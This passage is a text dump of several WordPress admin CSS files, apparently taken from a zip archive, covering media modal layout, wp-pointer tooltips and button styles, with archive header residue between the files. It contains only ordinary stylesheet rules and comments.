#2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-core-ui.media-modal .imgedit-group-top .dashicons-arrow-down.imgedit-help-toggle { margin-top: -3px; } .wp-core-ui.media-modal .image-editor h3 .imgedit-help-toggle { margin-top: -2px; } .media-modal .imgedit-help-toggled span.dashicons:before { content: "\f142"; content: "\f142" / ''; } .media-modal .imgedit-thumbnail-preview { margin: 10px 0 0 8px; } .imgedit-thumbnail-preview-caption { display: block; } .media-modal .imgedit-wrap div.updated, /* Back-compat for pre-5.5 */ .media-modal .imgedit-wrap .notice { margin: 0 16px; } /** * Embed from URL and Image Details */ .embed-url { display: block; position: relative; padding: 16px; margin: 0; z-index: 250; background: #fff; font-size: 18px; } .media-frame .embed-url input { font-size: 18px; line-height: 1.22222222; /* 22px */ padding: 12px 14px 12px 40px; /* right padding to leave room for the spinner */ width: 100%; min-width: 200px; box-shadow: inset -2px 2px 4px -2px rgba(0, 0, 0, 0.1); } .media-frame .embed-url input::-ms-clear { display: none; /* the "x" in IE 11 conflicts with the spinner */ } .media-frame .embed-url .spinner { position: absolute; top: 32px; left: 26px; } .media-frame .embed-loading .embed-url .spinner { visibility: visible; } .embed-link-settings, .embed-media-settings { position: absolute; top: 82px; right: 0; left: 0; bottom: 0; padding: 0 16px; overflow: auto; } .media-embed .embed-link-settings .link-text { margin-top: 0; } /* * Implementation of bottom padding in overflow content differs across browsers. * We need a different method. See https://github.com/w3c/csswg-drafts/issues/129 */ .embed-link-settings::after, .embed-media-settings::after { content: ""; display: flex; clear: both; height: 24px; } .media-embed .embed-link-settings { /* avoid Firefox to give focus to the embed preview container parent */ overflow: visible; } .embed-preview img, .embed-preview iframe, .embed-preview embed, .mejs-container video { max-width: 100%; vertical-align: middle; } .embed-preview a { display: inline-block; } .embed-preview img { display: block; height: auto; } .mejs-container:focus { outline: 1px solid #2271b1; box-shadow: 0 0 0 2px #2271b1; } .image-details .media-modal { right: 140px; left: 140px; } .image-details .media-frame-title, .image-details .media-frame-content, .image-details .media-frame-router { right: 0; } .image-details .embed-media-settings { top: 0; overflow: visible; padding: 0; } .image-details .embed-media-settings::after { content: none; } .image-details .embed-media-settings, .image-details .embed-media-settings div { box-sizing: border-box; } .image-details .column-settings { background: #f6f7f7; border-left: 1px solid #dcdcde; min-height: 100%; width: 55%; position: absolute; top: 0; right: 0; } .image-details .column-settings h2 { margin: 20px; padding-top: 20px; border-top: 1px solid #dcdcde; color: #1d2327; } .image-details .column-image { width: 45%; position: absolute; right: 55%; top: 0; } .image-details .image { margin: 20px; } .image-details .image img { max-width: 100%; max-height: 500px; } .image-details .advanced-toggle { padding: 0; color: #646970; text-transform: uppercase; text-decoration: none; } .image-details .advanced-toggle:hover, .image-details .advanced-toggle:active { color: #646970; } .image-details .advanced-toggle:after { font: normal 20px/1 dashicons; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; content: "\f140"; content: "\f140" / ''; display: inline-block; margin-top: -2px; } .image-details .advanced-visible .advanced-toggle:after { content: "\f142"; content: "\f142" / ''; } .image-details .custom-size label, /* Back-compat for pre-5.3 */ .image-details .custom-size .custom-size-setting { display: block; float: right; } .image-details .custom-size .custom-size-setting label { float: none; } .image-details .custom-size input { width: 5em; } .image-details .custom-size .sep { float: right; margin: 26px 6px 0; } .image-details .custom-size .description { margin-right: 0; } .media-embed .thumbnail { max-width: 100%; max-height: 200px; position: relative; float: right; } .media-embed .thumbnail img { max-height: 200px; display: block; } .media-embed .thumbnail:after { content: ""; display: block; position: absolute; top: 0; right: 0; left: 0; bottom: 0; box-shadow: inset 0 0 0 1px rgba(0, 0, 0, 0.1); overflow: hidden; } .media-embed .setting, .media-embed .setting-group { width: 100%; margin: 10px 0; float: right; display: block; clear: both; } .media-embed .setting-group .setting:not(.checkbox-setting) { margin: 0; } .media-embed .setting.has-description { margin-bottom: 5px; } .media-embed .description { clear: both; font-style: normal; } .media-embed .content-track + .description { line-height: 1.4; /* The !important needs to override a high specificity selector from wp-medialement.css */ max-width: none !important; } .media-embed .remove-track { margin-bottom: 10px; } .image-details .embed-media-settings .setting, .image-details .embed-media-settings .setting-group { float: none; width: auto; } .image-details .actions { margin: 10px 0; } .image-details .hidden { display: none; } .media-embed .setting input[type="text"], .media-embed .setting textarea, .media-embed fieldset { display: block; width: 100%; max-width: 400px; } .image-details .embed-media-settings .setting input[type="text"], .image-details .embed-media-settings .setting textarea { max-width: inherit; width: 70%; } .image-details .embed-media-settings .setting input.link-to-custom, .image-details .embed-media-settings .link-target, .image-details .embed-media-settings .custom-size, .image-details .embed-media-settings .setting-group, .image-details .description { margin-right: 27%; width: 70%; } .image-details .description { font-style: normal; margin-top: 0; } .image-details .embed-media-settings .link-target { margin-top: 16px; } .image-details .checkbox-label, .audio-details .checkbox-label, .video-details .checkbox-label { vertical-align: baseline; } .media-embed .setting input.hidden, .media-embed .setting textarea.hidden { display: none; } .media-embed .setting span, /* Back-compat for pre-5.3 */ .media-embed .setting .name, .media-embed .setting-group .name { display: inline-block; font-size: 13px; line-height: 1.84615384; color: #646970; } .media-embed .setting span { display: block; /* Back-compat for pre-5.3 */ width: 200px; /* Back-compat for pre-5.3 */ } .image-details .embed-media-settings .setting span, /* Back-compat for pre-5.3 */ .image-details .embed-media-settings .setting .name { float: right; width: 25%; text-align: left; margin: 8px 1% 0; line-height: 1.1; } /* Buttons group in IE 11. */ .media-frame .setting-group .button-group, .image-details .embed-media-settings .setting .button-group { width: auto; } .media-embed-sidebar { position: absolute; top: 0; right: 440px; } .advanced-section, .link-settings { margin-top: 10px; } /** * Button groups fix: can be removed together with the Back-compat for pre-5.3 */ .media-frame .setting .button-group { display: flex; margin: 0 !important; max-width: none !important; } /** * Localization */ .rtl .media-modal, .rtl .media-frame, .rtl .media-frame .search, .rtl .media-frame input[type="text"], .rtl .media-frame input[type="password"], .rtl .media-frame input[type="number"], .rtl .media-frame input[type="search"], .rtl .media-frame input[type="email"], .rtl .media-frame input[type="url"], .rtl .media-frame input[type="tel"], .rtl .media-frame textarea, .rtl .media-frame select { font-family: Tahoma, sans-serif; } :lang(he-il) .rtl .media-modal, :lang(he-il) .rtl .media-frame, :lang(he-il) .rtl .media-frame .search, :lang(he-il) .rtl .media-frame input[type="text"], :lang(he-il) .rtl .media-frame input[type="password"], :lang(he-il) .rtl .media-frame input[type="number"], :lang(he-il) .rtl .media-frame input[type="search"], :lang(he-il) .rtl .media-frame input[type="email"], :lang(he-il) .rtl .media-frame input[type="url"], :lang(he-il) .rtl .media-frame textarea, :lang(he-il) .rtl .media-frame select { font-family: Arial, sans-serif; } /** * Responsive layout */ @media only screen and (max-width: 900px) { .media-modal .media-frame-title { height: 40px; } .media-modal .media-frame-title h1 { line-height: 2.22222222; font-size: 18px; } .media-modal-close { width: 42px; height: 42px; } /* Drop-down menu */ .media-frame .media-frame-title { position: static; padding: 0 44px; text-align: center; } .media-frame:not(.hide-menu) .media-frame-router, .media-frame:not(.hide-menu) .media-frame-content, .media-frame:not(.hide-menu) .media-frame-toolbar { right: 0; } .media-frame:not(.hide-menu) .media-frame-router { /* 40 title + (40 - 6) menu toggle button + 6 spacing */ top: 80px; } .media-frame:not(.hide-menu) .media-frame-content { /* 80 + room for the tabs */ top: 114px; } .media-frame.hide-router .media-frame-content { top: 80px; } .media-frame:not(.hide-menu) .media-frame-menu { position: static; width: 0; } .media-frame:not(.hide-menu) .media-menu { display: none; width: auto; max-width: 80%; overflow: auto; z-index: 2000; top: 75px; right: 50%; transform: translateX(50%); left: auto; bottom: auto; padding: 5px 0; border: 1px solid #c3c4c7; } .media-frame:not(.hide-menu) .media-menu.visible { display: block; } .media-frame:not(.hide-menu) .media-menu > a { padding: 12px 16px; font-size: 16px; } .media-frame:not(.hide-menu) .media-menu .separator { margin: 5px 10px; } /* Visually hide the menu heading keeping it available to assistive technologies. */ .media-frame-menu-heading { clip-path: inset(50%); height: 1px; overflow: hidden; padding: 0; width: 1px; border: 0; margin: -1px; word-wrap: normal !important; } /* Reveal the menu toggle button. */ .wp-core-ui .media-frame:not(.hide-menu) .button.media-frame-menu-toggle { display: inline-flex; align-items: center; position: absolute; right: 50%; transform: translateX(50%); margin: -6px 0 0; padding: 0 12px 0 2px; font-size: 0.875rem; font-weight: 600; text-decoration: none; background: transparent; /* Only for IE11 to vertically align text within the inline-flex button */ height: 0.1%; /* Modern browsers */ min-height: 40px; } .wp-core-ui .button.media-frame-menu-toggle:hover, .wp-core-ui .button.media-frame-menu-toggle:active { background: transparent; transform: none; } .wp-core-ui .button.media-frame-menu-toggle:focus { /* Only visible in Windows High Contrast mode */ outline: 1px solid transparent; } /* End drop-down menu */ .media-sidebar { width: 230px; } .options-general-php .crop-content.site-icon, .wp-customizer:not(.mobile) .media-frame-content .crop-content.site-icon { margin-left: 262px; } .attachments-browser .attachments, .attachments-browser .uploader-inline, .attachments-browser .media-toolbar, .attachments-browser .attachments-wrapper, .attachments-browser.has-load-more .attachments-wrapper { left: 262px; } .attachments-browser .media-toolbar { height: 82px; } .attachments-browser .attachments, .attachments-browser .uploader-inline, .media-frame-content .attachments-browser .attachments-wrapper { top: 82px; } .media-sidebar .setting, .attachment-details .setting { margin: 6px 0; } .media-sidebar .setting input, .media-sidebar .setting textarea, .media-sidebar .setting .name, .attachment-details .setting input, .attachment-details .setting textarea, .attachment-details .setting .name, .compat-item label span { float: none; display: inline-block; } .media-sidebar .setting span, /* Back-compat for pre-5.3 */ .attachment-details .setting span, /* Back-compat for pre-5.3 */ .media-sidebar .checkbox-label-inline { float: none; } .media-sidebar .setting .select-label-inline { display: inline; } .media-sidebar .setting .name, .media-sidebar .checkbox-label-inline, .attachment-details .setting .name, .compat-item label span { text-align: inherit; min-height: 16px; margin: 0; padding: 8px 2px 2px; } /* Needs high specificity. */ .media-sidebar .setting .copy-to-clipboard-container, .attachment-details .attachment-info .copy-to-clipboard-container { margin-right: 0; padding-top: 0; } .media-sidebar .setting .copy-attachment-url, .attachment-details .attachment-info .copy-attachment-url { margin: 0 1px; } .media-sidebar .setting .value, .attachment-details .setting .value { float: none; width: auto; } .media-sidebar .setting input[type="text"], .media-sidebar .setting input[type="password"], .media-sidebar .setting input[type="email"], .media-sidebar .setting input[type="number"], .media-sidebar .setting input[type="search"], .media-sidebar .setting input[type="tel"], .media-sidebar .setting input[type="url"], .media-sidebar .setting textarea, .media-sidebar .setting select, .attachment-details .setting input[type="text"], .attachment-details .setting input[type="password"], .attachment-details .setting input[type="email"], .attachment-details .setting input[type="number"], .attachment-details .setting input[type="search"], .attachment-details .setting input[type="tel"], .attachment-details .setting input[type="url"], .attachment-details .setting textarea, .attachment-details .setting select, .attachment-details .setting + .description { float: none; width: 98%; max-width: none; height: auto; } .media-frame .media-toolbar input[type="search"] { line-height: 2.25; /* 36px */ } .media-sidebar .setting select.columns, .attachment-details .setting select.columns { width: auto; } .media-frame input, .media-frame textarea, .media-frame .search { padding: 3px 6px; } .wp-admin .media-frame select { min-height: 40px; font-size: 16px; line-height: 1.625; padding: 5px 8px 5px 24px; } .image-details .column-image { width: 30%; right: 70%; } .image-details .column-settings { width: 70%; } .image-details .media-modal { right: 30px; left: 30px; } .image-details .embed-media-settings .setting, .image-details .embed-media-settings .setting-group { margin: 20px; } .image-details .embed-media-settings .setting span, /* Back-compat for pre-5.3 */ .image-details .embed-media-settings .setting .name { float: none; text-align: right; width: 100%; margin-bottom: 4px; margin-right: 0; } .media-modal .legend-inline { position: static; transform: none; margin-right: 0; margin-bottom: 6px; } .image-details .embed-media-settings .setting-group .setting { margin-bottom: 0; } .image-details .embed-media-settings .setting input.link-to-custom, .image-details .embed-media-settings .setting input[type="text"], .image-details .embed-media-settings .setting textarea { width: 100%; margin-right: 0; } .image-details .embed-media-settings .setting.has-description { margin-bottom: 5px; } .image-details .description { width: auto; margin: 0 20px; } .image-details .embed-media-settings .custom-size { margin-right: 20px; } .collection-settings .setting input[type="checkbox"] { float: none; margin-top: 0; } .media-selection { min-width: 120px; } .media-selection:after { background: none; } .media-selection .attachments { display: none; } .media-modal .attachments-browser .media-toolbar .search { max-width: 100%; height: auto; float: left; } .media-modal .attachments-browser .media-toolbar .attachment-filters { height: auto; } /* Text inputs need to be 16px, or they force zooming on iOS */ .media-frame input[type="text"], .media-frame input[type="password"], .media-frame input[type="number"], .media-frame input[type="search"], .media-frame input[type="email"], .media-frame input[type="url"], .media-frame textarea, .media-frame select { font-size: 16px; line-height: 1.5; } .media-frame .media-toolbar input[type="search"] { line-height: 2.3755; /* 38px */ } .media-modal .media-toolbar .spinner { margin-bottom: 10px; } } @media screen and (max-width: 782px) { .imgedit-panel-content { grid-template-columns: auto; } .media-frame-toolbar .media-toolbar { bottom: -54px; } .mode-grid .attachments-browser .media-toolbar-primary { display: grid; grid-template-columns: auto 1fr; } .mode-grid .attachments-browser .media-toolbar-primary input[type="search"] { width: 100%; } .media-sidebar .copy-to-clipboard-container .success, .attachment-details .copy-to-clipboard-container .success { font-size: 14px; line-height: 2.71428571; } .media-frame .wp-filter .media-toolbar-secondary { position: unset; } .media-frame .media-toolbar-secondary .spinner { position: absolute; top: 0; bottom: 0; margin: auto; right: 0; left: 0; z-index: 9; } .media-bg-overlay { content: ''; background: #ffffff; width: 100%; height: 100%; display: none; position: absolute; right: 0; left: 0; top: 0; bottom: 0; opacity: 0.6; } } /* Responsive on portrait and landscape */ @media only screen and (max-width: 640px), screen and (max-height: 400px) { /* Full-bleed modal */ .media-modal, .image-details .media-modal { position: fixed; top: 0; right: 0; left: 0; bottom: 0; } .media-modal-backdrop { position: fixed; } .options-general-php .crop-content.site-icon, .wp-customizer:not(.mobile) .media-frame-content .crop-content.site-icon { margin-left: 0; } .media-sidebar { z-index: 1900; max-width: 70%; bottom: 120%; box-sizing: border-box; padding-bottom: 0; } .media-sidebar.visible { bottom: 0; } .attachments-browser .attachments, .attachments-browser .uploader-inline, .attachments-browser .media-toolbar, .media-frame-content .attachments-browser .attachments-wrapper { left: 0; } .image-details .media-frame-title { display: block; top: 0; font-size: 14px; } .image-details .column-image, .image-details .column-settings { width: 100%; position: relative; right: 0; } .image-details .column-settings { padding: 4px 0; } /* Media tabs on the top */ .media-frame-content .media-toolbar .instructions { display: none; } /* Change margin direction on load more button in responsive views. */ .load-more-wrapper .load-more-jump { margin: 12px 0 0; } } @media only screen and (min-width: 901px) and (max-height: 400px) { .media-menu, .media-frame:not(.hide-menu) .media-menu { top: 0; padding-top: 44px; } /* Change margin direction on load more button in responsive views. */ .load-more-wrapper .load-more-jump { margin: 12px 0 0; } } @media only screen and (max-width: 480px) { .wp-core-ui.wp-customizer .media-button { margin-top: 13px; } } /** * HiDPI Displays */ @media print, (min-resolution: 120dpi) { .wp-core-ui .media-modal-icon { background-image: url(../images/uploader-icons-2x.png); background-size: 134px 15px; } .media-frame .spinner { background-image: url(../images/spinner-2x.gif); } } .media-frame-content[data-columns="1"] .attachment { width: 100%; } .media-frame-content[data-columns="2"] .attachment { width: 50%; } .media-frame-content[data-columns="3"] .attachment { width: 33.33%; } .media-frame-content[data-columns="4"] .attachment { width: 25%; } .media-frame-content[data-columns="5"] .attachment { width: 20%; } .media-frame-content[data-columns="6"] .attachment { width: 16.66%; } .media-frame-content[data-columns="7"] .attachment { width: 14.28%; } .media-frame-content[data-columns="8"] .attachment { width: 12.5%; } .media-frame-content[data-columns="9"] .attachment { width: 11.11%; } .media-frame-content[data-columns="10"] .attachment { width: 10%; } .media-frame-content[data-columns="11"] .attachment { width: 9.09%; } .media-frame-content[data-columns="12"] .attachment { width: 8.33%; } PK!jwp-pointer.cssnuȯ.wp-pointer-content { padding: 0 0 10px; position: relative; font-size: 13px; background: #fff; border: 1px solid #c3c4c7; box-shadow: 0 3px 6px rgba(0, 0, 0, 0.08); } .wp-pointer-content h3 { position: relative; margin: -1px -1px 5px; padding: 15px 18px 14px 60px; border: 1px solid #2271b1; border-bottom: none; line-height: 1.4; font-size: 14px; color: #fff; background: #2271b1; } .wp-pointer-content h3:before { background: #fff; border-radius: 50%; color: #2271b1; content: "\f227"; content: "\f227" / ''; font: normal 20px/1.6 dashicons; position: absolute; top: 8px; left: 15px; text-align: center; width: 32px; height: 32px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .wp-pointer-content h4 { margin: 1.33em 20px 1em; font-size: 1.15em; } .wp-pointer-content p { padding: 0 20px; } .wp-pointer-buttons { margin: 0; padding: 5px 15px; overflow: auto; } .wp-pointer-buttons a { float: right; display: inline-block; text-decoration: none; } .wp-pointer-buttons a.close { padding-left: 3px; position: relative; } .wp-pointer-buttons a.close:before { background: none; color: #787c82; content: "\f153"; content: "\f153" / ''; display: block !important; font: normal 16px/1 dashicons; margin: 1px 0; text-align: center; -webkit-font-smoothing: antialiased !important; width: 10px; height: 100%; position: absolute; left: -15px; top: 1px; } .wp-pointer-buttons a.close:hover:before { color: #d63638; } /* The arrow base class must take up no space, even with transparent borders. */ .wp-pointer-arrow, .wp-pointer-arrow-inner { position: absolute; width: 0; height: 0; } .wp-pointer-arrow { z-index: 10; width: 0; height: 0; border: 0 solid transparent; } .wp-pointer-arrow-inner { z-index: 20; } /* Make Room for the Arrow! */ .wp-pointer-top, .wp-pointer-undefined { padding-top: 13px; } .wp-pointer-bottom { margin-top: -13px; padding-bottom: 13px; } /* rtl:ignore */ .wp-pointer-left { padding-left: 13px; } /* rtl:ignore */ .wp-pointer-right { margin-left: -13px; padding-right: 13px; } /* Base Size & Positioning */ .wp-pointer-top .wp-pointer-arrow, .wp-pointer-bottom .wp-pointer-arrow, .wp-pointer-undefined .wp-pointer-arrow { left: 50px; } .wp-pointer-left .wp-pointer-arrow, .wp-pointer-right .wp-pointer-arrow { top: 50%; margin-top: -15px; } /* Arrow Sprite */ .wp-pointer-top .wp-pointer-arrow, .wp-pointer-undefined .wp-pointer-arrow { top: 0; border-width: 0 13px 13px; border-bottom-color: #2271b1; } .wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer-undefined .wp-pointer-arrow-inner { top: 1px; margin-left: -13px; margin-top: -13px; border: 13px solid transparent; border-bottom-color: #2271b1; display: block; content: " "; } .wp-pointer-bottom .wp-pointer-arrow { bottom: 0; border-width: 13px 13px 0; border-top-color: #c3c4c7; } .wp-pointer-bottom .wp-pointer-arrow-inner { bottom: 1px; margin-left: -13px; margin-bottom: -13px; border: 13px solid transparent; border-top-color: #fff; display: block; content: " "; } /* rtl:ignore */ .wp-pointer-left .wp-pointer-arrow { left: 0; border-width: 13px 13px 13px 0; border-right-color: #c3c4c7; } /* rtl:ignore */ .wp-pointer-left .wp-pointer-arrow-inner { left: 1px; margin-left: -13px; margin-top: -13px; border: 13px solid transparent; border-right-color: #fff; display: block; content: " "; } /* rtl:ignore */ .wp-pointer-right .wp-pointer-arrow { right: 0; border-width: 13px 0 13px 13px; border-left-color: #c3c4c7; } /* rtl:ignore */ .wp-pointer-right .wp-pointer-arrow-inner { right: 1px; margin-right: -13px; margin-top: -13px; border: 13px solid transparent; border-left-color: #fff; display: block; content: " "; } .wp-pointer.arrow-bottom .wp-pointer-content { margin-bottom: -45px; } .wp-pointer.arrow-bottom .wp-pointer-arrow { top: 100%; margin-top: -30px; } /* Disable pointers at responsive sizes */ @media screen and (max-width: 782px) { .wp-pointer { display: none; } } PK!O|B##wp-embed-template-ie.min.cssnuȯ/*! This file is auto-generated */ PK!H wp-pointer.min.cssnuȯ/*! This file is auto-generated */ .wp-pointer-content{padding:0 0 10px;position:relative;font-size:13px;background:#fff;border:1px solid #c3c4c7;box-shadow:0 3px 6px rgba(0,0,0,.08)}.wp-pointer-content h3{position:relative;margin:-1px -1px 5px;padding:15px 18px 14px 60px;border:1px solid #2271b1;border-bottom:none;line-height:1.4;font-size:14px;color:#fff;background:#2271b1}.wp-pointer-content h3:before{background:#fff;border-radius:50%;color:#2271b1;content:"\f227";content:"\f227"/'';font:normal 20px/1.6 dashicons;position:absolute;top:8px;left:15px;text-align:center;width:32px;height:32px;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.wp-pointer-content h4{margin:1.33em 20px 1em;font-size:1.15em}.wp-pointer-content p{padding:0 20px}.wp-pointer-buttons{margin:0;padding:5px 15px;overflow:auto}.wp-pointer-buttons a{float:right;display:inline-block;text-decoration:none}.wp-pointer-buttons a.close{padding-left:3px;position:relative}.wp-pointer-buttons a.close:before{background:0 0;color:#787c82;content:"\f153";content:"\f153"/'';display:block!important;font:normal 16px/1 dashicons;margin:1px 0;text-align:center;-webkit-font-smoothing:antialiased!important;width:10px;height:100%;position:absolute;left:-15px;top:1px}.wp-pointer-buttons a.close:hover:before{color:#d63638}.wp-pointer-arrow,.wp-pointer-arrow-inner{position:absolute;width:0;height:0}.wp-pointer-arrow{z-index:10;width:0;height:0;border:0 solid transparent}.wp-pointer-arrow-inner{z-index:20}.wp-pointer-top,.wp-pointer-undefined{padding-top:13px}.wp-pointer-bottom{margin-top:-13px;padding-bottom:13px}.wp-pointer-left{padding-left:13px}.wp-pointer-right{margin-left:-13px;padding-right:13px}.wp-pointer-bottom .wp-pointer-arrow,.wp-pointer-top .wp-pointer-arrow,.wp-pointer-undefined .wp-pointer-arrow{left:50px}.wp-pointer-left .wp-pointer-arrow,.wp-pointer-right .wp-pointer-arrow{top:50%;margin-top:-15px}.wp-pointer-top .wp-pointer-arrow,.wp-pointer-undefined .wp-pointer-arrow{top:0;border-width:0 13px 13px;border-bottom-color:#2271b1}.wp-pointer-top .wp-pointer-arrow-inner,.wp-pointer-undefined .wp-pointer-arrow-inner{top:1px;margin-left:-13px;margin-top:-13px;border:13px solid transparent;border-bottom-color:#2271b1;display:block;content:" "}.wp-pointer-bottom .wp-pointer-arrow{bottom:0;border-width:13px 13px 0;border-top-color:#c3c4c7}.wp-pointer-bottom .wp-pointer-arrow-inner{bottom:1px;margin-left:-13px;margin-bottom:-13px;border:13px solid transparent;border-top-color:#fff;display:block;content:" "}.wp-pointer-left .wp-pointer-arrow{left:0;border-width:13px 13px 13px 0;border-right-color:#c3c4c7}.wp-pointer-left .wp-pointer-arrow-inner{left:1px;margin-left:-13px;margin-top:-13px;border:13px solid transparent;border-right-color:#fff;display:block;content:" "}.wp-pointer-right .wp-pointer-arrow{right:0;border-width:13px 0 13px 13px;border-left-color:#c3c4c7}.wp-pointer-right .wp-pointer-arrow-inner{right:1px;margin-right:-13px;margin-top:-13px;border:13px solid transparent;border-left-color:#fff;display:block;content:" "}.wp-pointer.arrow-bottom .wp-pointer-content{margin-bottom:-45px}.wp-pointer.arrow-bottom .wp-pointer-arrow{top:100%;margin-top:-30px}@media screen and (max-width:782px){.wp-pointer{display:none}}PK!6&&buttons-rtl.cssnu[/*! This file is auto-generated */ /* ---------------------------------------------------------------------------- NOTE: If you edit this file, you should make sure that the CSS rules for buttons in the following files are updated. * jquery-ui-dialog.css * editor.css WordPress-style Buttons ======================= Create a button by adding the `.button` class to an element. For backward compatibility, we support several other classes (such as `.button-secondary`), but these will *not* work with the stackable classes described below. Button Styles ------------- To display a primary button style, add the `.button-primary` class to a button. Button Sizes ------------ Adjust a button's size by adding the `.button-large` or `.button-small` class. Button States ------------- Lock the state of a button by adding the name of the pseudoclass as an actual class (e.g. `.hover` for `:hover`). TABLE OF CONTENTS: ------------------ 1.0 - Button Layouts 2.0 - Default Button Style 3.0 - Primary Button Style 4.0 - Button Groups 5.0 - Responsive Button Styles ---------------------------------------------------------------------------- */ /* ---------------------------------------------------------------------------- 1.0 - Button Layouts ---------------------------------------------------------------------------- */ .wp-core-ui .button, .wp-core-ui .button-primary, .wp-core-ui .button-secondary { display: inline-block; text-decoration: none; font-size: 13px; line-height: 2.15384615; /* 28px */ min-height: 30px; margin: 0; padding: 0 10px; cursor: pointer; border-width: 1px; border-style: solid; -webkit-appearance: none; border-radius: 3px; white-space: nowrap; box-sizing: border-box; } /* Remove the dotted border on :focus and the extra padding in Firefox */ .wp-core-ui button::-moz-focus-inner, .wp-core-ui input[type="reset"]::-moz-focus-inner, .wp-core-ui input[type="button"]::-moz-focus-inner, .wp-core-ui input[type="submit"]::-moz-focus-inner { border-width: 0; border-style: none; padding: 0; } .wp-core-ui .button.button-large, .wp-core-ui .button-group.button-large .button { min-height: 32px; line-height: 2.30769231; /* 30px */ padding: 0 12px; } .wp-core-ui .button.button-small, .wp-core-ui .button-group.button-small .button { min-height: 26px; line-height: 2.18181818; /* 24px */ padding: 0 8px; font-size: 11px; } .wp-core-ui .button.button-hero, .wp-core-ui .button-group.button-hero .button { font-size: 14px; min-height: 46px; line-height: 3.14285714; padding: 0 36px; } .wp-core-ui .button.hidden { display: none; } /* Style Reset buttons as simple text links */ .wp-core-ui input[type="reset"], .wp-core-ui input[type="reset"]:hover, .wp-core-ui input[type="reset"]:active, .wp-core-ui input[type="reset"]:focus { background: none; border: none; box-shadow: none; padding: 0 2px 1px; width: auto; } /* ---------------------------------------------------------------------------- 2.0 - Default Button Style ---------------------------------------------------------------------------- */ .wp-core-ui .button, .wp-core-ui .button-secondary { color: #2271b1; border-color: #2271b1; background: #f6f7f7; vertical-align: top; } .wp-core-ui p .button { vertical-align: baseline; } .wp-core-ui .button.hover, .wp-core-ui .button:hover, .wp-core-ui .button-secondary:hover{ background: #f0f0f1; border-color: #0a4b78; color: #0a4b78; } .wp-core-ui .button.focus, .wp-core-ui .button:focus, .wp-core-ui .button-secondary:focus { background: #f6f7f7; border-color: #3582c4; color: #0a4b78; box-shadow: 0 0 0 1px #3582c4; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; /* Reset inherited offset from Gutenberg */ outline-offset: 0; } /* :active state */ .wp-core-ui .button:active, .wp-core-ui .button-secondary:active { background: #f6f7f7; border-color: #8c8f94; box-shadow: none; } /* pressed state e.g. a selected setting */ .wp-core-ui .button.active, .wp-core-ui .button.active:hover { background-color: #dcdcde; color: #135e96; border-color: #0a4b78; box-shadow: inset 0 2px 5px -3px #0a4b78; } .wp-core-ui .button.active:focus { border-color: #3582c4; box-shadow: inset 0 2px 5px -3px #0a4b78, 0 0 0 1px #3582c4; } .wp-core-ui .button[disabled], .wp-core-ui .button:disabled, .wp-core-ui .button.disabled, .wp-core-ui .button-secondary[disabled], .wp-core-ui .button-secondary:disabled, .wp-core-ui .button-secondary.disabled, .wp-core-ui .button-disabled { color: #a7aaad !important; border-color: #dcdcde !important; background: #f6f7f7 !important; box-shadow: none !important; cursor: default; transform: none !important; } .wp-core-ui .button[aria-disabled="true"], .wp-core-ui .button-secondary[aria-disabled="true"] { cursor: default; } /* Buttons that look like links, for a cross of good semantics with the visual */ .wp-core-ui .button-link { margin: 0; padding: 0; box-shadow: none; border: 0; border-radius: 0; background: none; cursor: pointer; text-align: right; /* Mimics the default link style in common.css */ color: #2271b1; text-decoration: underline; transition-property: border, background, color; transition-duration: .05s; transition-timing-function: ease-in-out; } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active { color: #135e96; } .wp-core-ui .button-link:focus { color: #043959; box-shadow: 0 0 0 2px #2271b1; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .wp-core-ui .button-link-delete { color: #d63638; } .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: #d63638; background: transparent; } .wp-core-ui .button-link-delete:disabled { /* overrides the default buttons disabled background */ background: transparent !important; } /* ---------------------------------------------------------------------------- 3.0 - Primary Button Style ---------------------------------------------------------------------------- */ .wp-core-ui .button-primary { background: #2271b1; border-color: #2271b1; color: #fff; text-decoration: none; text-shadow: none; } .wp-core-ui .button-primary.hover, .wp-core-ui .button-primary:hover, .wp-core-ui .button-primary.focus, .wp-core-ui .button-primary:focus { background: #135e96; border-color: #135e96; color: #fff; } .wp-core-ui .button-primary.focus, .wp-core-ui .button-primary:focus { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #2271b1; } .wp-core-ui .button-primary.active, .wp-core-ui .button-primary.active:hover, .wp-core-ui .button-primary.active:focus, .wp-core-ui .button-primary:active { background: #135e96; border-color: #135e96; box-shadow: none; color: #fff; } .wp-core-ui .button-primary[disabled], .wp-core-ui .button-primary:disabled, .wp-core-ui .button-primary-disabled, .wp-core-ui .button-primary.disabled { color: #a7aaad !important; background: #f6f7f7 !important; border-color: #dcdcde !important; box-shadow: none !important; text-shadow: none !important; cursor: default; } .wp-core-ui .button-primary[aria-disabled="true"] { cursor: default; } /* ---------------------------------------------------------------------------- 4.0 - Button Groups ---------------------------------------------------------------------------- */ .wp-core-ui .button-group { position: relative; display: inline-block; white-space: nowrap; font-size: 0; vertical-align: middle; } .wp-core-ui .button-group > .button { display: inline-block; border-radius: 0; margin-left: -1px; } .wp-core-ui .button-group > .button:first-child { border-radius: 0 3px 3px 0; } .wp-core-ui .button-group > .button:last-child { border-radius: 3px 0 0 3px; } .wp-core-ui .button-group > .button-primary + .button { border-right: 0; } .wp-core-ui .button-group > .button:focus { position: relative; z-index: 1; } /* pressed state e.g. a selected setting */ .wp-core-ui .button-group > .button.active { background-color: #dcdcde; color: #135e96; border-color: #0a4b78; box-shadow: inset 0 2px 5px -3px #0a4b78; } .wp-core-ui .button-group > .button.active:focus { border-color: #3582c4; box-shadow: inset 0 2px 5px -3px #0a4b78, 0 0 0 1px #3582c4; } /* ---------------------------------------------------------------------------- 5.0 - Responsive Button Styles ---------------------------------------------------------------------------- */ @media screen and (max-width: 782px) { .wp-core-ui .button, .wp-core-ui .button.button-large, .wp-core-ui .button.button-small, input#publish, input#save-post, a.preview { padding: 0 14px; line-height: 2.71428571; /* 38px */ font-size: 14px; vertical-align: middle; min-height: 40px; margin-bottom: 4px; } /* Copy attachment URL button in the legacy edit media page. */ .wp-core-ui .copy-to-clipboard-container 